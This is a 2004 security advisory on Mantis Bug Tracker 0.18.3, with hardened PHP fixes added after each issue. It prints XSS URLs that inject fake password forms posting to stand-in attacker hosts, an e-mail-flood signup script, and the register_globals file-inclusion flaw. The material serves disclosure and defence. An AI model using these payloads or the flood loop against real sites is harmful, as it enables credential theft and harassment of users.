[UNIX] Mantis Bug Tracker Multiple Vulnerabilities

Subject: [UNIX] Mantis Bug Tracker Multiple Vulnerabilities
Date: 22 Aug 2004 17:24:17 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Mantis Bug Tracker Multiple Vulnerabilities
------------------------------------------------------------------------


SUMMARY

Mantis (http://www.mantisbt.org/) is "a web-based bug tracking system. It 
is written in the PHP scripting language and requires the MySQL database 
and a web server".

The Mantis bug tracking system suffers from multiple security issues 
mainly due to improper input validation. Hence, cross-site scripting and 
even PHP code execution are possible through this system.

DETAILS

Vulnerable Systems:
 * Mantis version 0.18.3

Immune Systems:
 * Mantis version 0.19.0a2 (Alpha) from CVS

 * The 'return' parameter of the login_page.php script is not properly 
sanitized and lets a malicious user supply arbitrary content. A visitor can 
browse anonymously and, when a privileged action requires it, is sent to 
log in as a registered user; the previous URL is passed in the 'return' 
parameter, and any HTML or script code can be injected through it. An 
example of the XSS vulnerability:
http://<site-with-mantis-bugtracker>/login_page.php?return=%22%3E%3Ch1%3EHello!%3C/h1%3E%3Cform action=%22http://malicious.site.com/script.xxx%22%3EPlease type your password : %3Cinput type=%22password%22 name=%22your_password%22%3E%3Cbr%3E%3Cinput type=%22submit%22 value=%22Give me your password, please...%22%3E%3C/form%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr

 * Another XSS vulnerability can be found in the signup.php script (ex.: 
http://bugs.mantisbt.org/signup.php). The Email address field is not 
properly sanitized and will allow dangerous content to be passed. One can 
put the following into the Email address:
<iframe src=http://www.playboy.com></iframe> or <h1>Hi!</h1>

 * The 'Select Project' script is also vulnerable to a cross-site 
scripting attack. The script is 'login_select_proj_page.php' and the 
following URL can be used to demonstrate and exploit this issue:
http://<site-with-mantis-bugtracker>/login_select_proj_page.php?ref=%3Cbr%3E%3Cform action=%22http://my.fucking.site/xxx.sss%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3EUsername:%3C/td%3E%3Ctd%3E%3Cinput type=text name=user%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput type=password name=pass%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd colspan=2%3E%3Cinput type=submit value=%22login%22 onclick=%22javascript:alert('hi')%22%3E%3C/td%3E%3C/tr%3E%3C/form%3E

 * A cross-site scripting vulnerability also exists in 'view_all_set.php'; 
an example is given below:
http://<site-with-mantis-bugtracker>/view_all_set.php?type=1&reporter_id=5031&hide_status=80<script>alert('hi')</script>
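The four issues above share one root cause: a request value (the 'return' URL, the e-mail field, the 'ref' parameter) is written back into the page without being validated or encoded. The following is an added example, not code from Mantis or from the advisory's author; the form layout, function names and the default path are assumptions. It shows the vulnerable pattern for the 'return' parameter next to a hardened version that first restricts the value to a local path (which also closes the open-redirect angle) and then HTML-encodes it, and applies the same validate-then-encode treatment to the signup e-mail field.

```php
<?php
// Added example (not Mantis code): reflected 'return' parameter and e-mail field.
// Function names, form layout and the default path are assumptions for illustration.

// Vulnerable pattern: the previous URL is dropped straight into an attribute,
// so a value containing '">' closes the attribute and the tag and the rest of
// the payload becomes page markup.
function login_form_vulnerable(string $return): string {
    return '<form action="login.php" method="post">'
         . '<input type="hidden" name="return" value="' . $return . '">'
         . '<input type="password" name="password">'
         . '</form>';
}

// Hardened pattern, two layers:
//  1. accept only a relative path inside this site as the return target
//     (no scheme, no '//' prefix, no characters that could close an attribute);
//  2. HTML-encode whatever is echoed into the attribute regardless.
function sanitize_return(string $return): string {
    if (preg_match('#\A/(?!/)[A-Za-z0-9_./?&=%-]*\z#', $return) !== 1) {
        return '/view_all_bug_page.php';   // assumed safe default landing page
    }
    return $return;
}

function login_form_hardened(string $return): string {
    $safe = htmlspecialchars(sanitize_return($return), ENT_QUOTES, 'UTF-8');
    return '<form action="login.php" method="post">'
         . '<input type="hidden" name="return" value="' . $safe . '">'
         . '<input type="password" name="password">'
         . '</form>';
}

// Same treatment for the e-mail field on the signup page: validate the value
// as an address, then encode it before it is ever redisplayed.
function email_for_redisplay(string $email): string {
    $valid = filter_var($email, FILTER_VALIDATE_EMAIL);
    return $valid === false ? '' : htmlspecialchars($valid, ENT_QUOTES, 'UTF-8');
}

// Constructed input: the advisory's first payload, URL-decoded.
$payload = '"><h1>Hello!</h1><form action="http://malicious.site.com/script.xxx">';

echo login_form_vulnerable($payload), "\n";          // <h1> and a second <form> land in the page
echo login_form_hardened($payload), "\n";            // value falls back to the default path
echo login_form_hardened('/view.php?id=42'), "\n";   // a legitimate local path is preserved
echo email_for_redisplay('<iframe src=http://example.invalid></iframe>'), "\n"; // empty string
echo email_for_redisplay('user@example.invalid'), "\n";                          // user@example.invalid
```

Encoding alone would already stop the markup injection; the path check is the extra step that keeps 'return' from being abused as a redirect to another host, which encoding does nothing about.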


In addition to the multiple cross-site scripting vulnerabilities, the 
product can be made to send an arbitrarily large number of e-mails to a 
chosen user, by repeatedly requesting signup.php with a fresh username and 
the same e-mail address each time.

Exploit:
The following script can be used to determine whether your system is 
vulnerable to this attack or not:
<?php

// Please change this address, because it is my e-mail :)
$email = "anyemail@address";
$base_user = "test";
$site = "<site-with-mantis-bugtracker>";   // host name of the Mantis installation

for ($i = 0; $i <= 15; $i++)
{
 echo("Sending e-mail number $i\n");
 $user = "$base_user$i";
 echo("New user is $user\n");
 // Every signup with a new username causes one mail to be sent to $email.
 // fopen() on a URL requires allow_url_fopen to be enabled.
 $url = "http://$site/signup.php?username=$user&email=$email";
 echo("URL is $url\n");
 $fd = fopen($url, "r");
 if ($fd !== false) {
  fclose($fd);
  echo("E-mail $i sent\n");
 } else {
  echo("Request $i failed\n");
 }
}

?>
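The flood works because nothing ties the number of signup mails to the address that receives them. A per-address (and per-source) throttle stops it without touching the signup flow itself. This is an added example, not Mantis code: the window length, the allowances and the in-memory store are assumptions, and a real deployment would keep the counters in the database. It replays the advisory's loop (sixteen usernames, one address) against the throttle.

```php
<?php
// Added example (not Mantis code): a signup throttle keyed on the target
// e-mail address and on the requesting client. Window sizes and the in-memory
// store are assumptions for illustration.

const SIGNUP_WINDOW_SECONDS = 3600;   // assumed: one hour
const SIGNUPS_PER_EMAIL     = 1;      // one signup mail per address per window
const SIGNUPS_PER_CLIENT    = 3;      // assumed allowance per source IP per window

// $store maps "email:<addr>" and "client:<ip>" to a list of accepted timestamps.
// Returns true if the signup (and therefore the mail) may go ahead.
function signup_allowed(array &$store, string $email, string $client_ip, int $now): bool {
    $email = strtolower(trim($email));
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return false;                               // malformed address: send nothing
    }
    $limits = [
        'email:' . $email      => SIGNUPS_PER_EMAIL,
        'client:' . $client_ip => SIGNUPS_PER_CLIENT,
    ];
    foreach ($limits as $key => $limit) {
        // keep only timestamps inside the sliding window
        $recent = array_filter($store[$key] ?? [], fn($t) => $t > $now - SIGNUP_WINDOW_SECONDS);
        if (count($recent) >= $limit) {
            return false;                           // quota for this key is used up
        }
        $store[$key] = array_values($recent);
    }
    foreach (array_keys($limits) as $key) {
        $store[$key][] = $now;                      // record only accepted signups
    }
    return true;
}

// Constructed replay of the advisory's loop: test0..test15, one victim address.
$store = [];
$sent = 0;
for ($i = 0; $i <= 15; $i++) {
    if (signup_allowed($store, 'victim@example.invalid', '203.0.113.7', 1000 + $i)) {
        $sent++;                                    // only the first request gets through
    }
}
echo "signup mails sent: $sent\n";                  // 1

// Once the window has elapsed the address may legitimately sign up again.
$later = 1000 + SIGNUP_WINDOW_SECONDS + 20;
var_dump(signup_allowed($store, 'victim@example.invalid', '203.0.113.7', $later)); // bool(true)

// A malformed address never triggers a mail at all.
var_dump(signup_allowed($store, '<h1>Hi!</h1>', '203.0.113.7', $later));           // bool(false)
```

The address check does double duty: it is the same validation that keeps markup out of the e-mail field on the signup page, so the throttle and the XSS fix share one gate.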

Finally, there is also a remote PHP code execution issue. If PHP's 
register_globals setting is enabled, an attacker can inject and execute PHP 
code by overwriting the global variable that holds the core directory path 
before it is used in an include. The vulnerable scripts are:
bug_api.php -> line 22 (using the variable $t_core_path)
relationship_api.php -> line 14 (using the variable $t_core_dir)
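The pattern behind this issue is an include prefix that lives in an ordinary global and is merely assumed to have been set by an earlier include; under register_globals a request variable of the same name is created first and wins. The following is an added example, not Mantis code, and the file and function names are assumptions. It contrasts that loader with one that derives the prefix from its own location immediately before use, rejects anything that is not a local directory, and declines to run at all while register_globals is on.

```php
<?php
// Added example (not Mantis code): include prefix held in a global versus a
// loader that does not depend on request-controllable state. File and
// function names are assumptions for illustration.

// Vulnerable pattern. $t_core_dir is expected to have been set by an earlier
// include, but nothing here guarantees it. With register_globals=On, a request
// variable named t_core_dir creates the global before this runs, and
// require_once then loads whatever that value points at (a remote URL, if
// allow_url_fopen permits).
function load_core_vulnerable(): void {
    global $t_core_dir;
    require_once($t_core_dir . 'constant_inc.php');
}

// Hardened loader:
//  1. refuse to run under register_globals at all;
//  2. compute the prefix from this file's own location right before use, so
//     no request variable can pre-seed it;
//  3. reject anything that is not a plain local directory as a second check.
function core_dir(): string {
    $dir = __DIR__ . DIRECTORY_SEPARATOR . 'core' . DIRECTORY_SEPARATOR;
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $dir) === 1 || !is_dir($dir)) {
        throw new RuntimeException("core directory is not a local path: $dir");
    }
    return $dir;
}

function load_core_hardened(): void {
    // ini_get() returns false/"" on PHP versions that dropped the setting,
    // which FILTER_VALIDATE_BOOLEAN maps to false.
    if (filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN)) {
        throw new RuntimeException('refusing to run while register_globals is enabled');
    }
    require_once(core_dir() . 'constant_inc.php');
}

// Constructed demonstration: simulate the global that register_globals would
// have imported and show that the hardened prefix is unaffected by it.
$t_core_dir = 'http://attacker.invalid/';
echo "vulnerable loader would include: ", $t_core_dir . 'constant_inc.php', "\n";
try {
    echo "hardened loader would include:   ", core_dir() . 'constant_inc.php', "\n";
} catch (RuntimeException $e) {
    // no ./core/ directory beside this script, so the local-path check fails closed
    echo "hardened loader refused: ", $e->getMessage(), "\n";
}
```

The decisive change is step 2: once the prefix is assigned unconditionally from __DIR__ at the point of use, the value a request carried is simply overwritten, and steps 1 and 3 only remain as defence in depth.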

Vendor Status:
The maintainers of Mantis have been informed and the fixes are already in 
the CVS tree, in the alpha version.


ADDITIONAL INFORMATION

The information has been provided by Joxean Koret (joxeankoret@yahoo.es).



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 



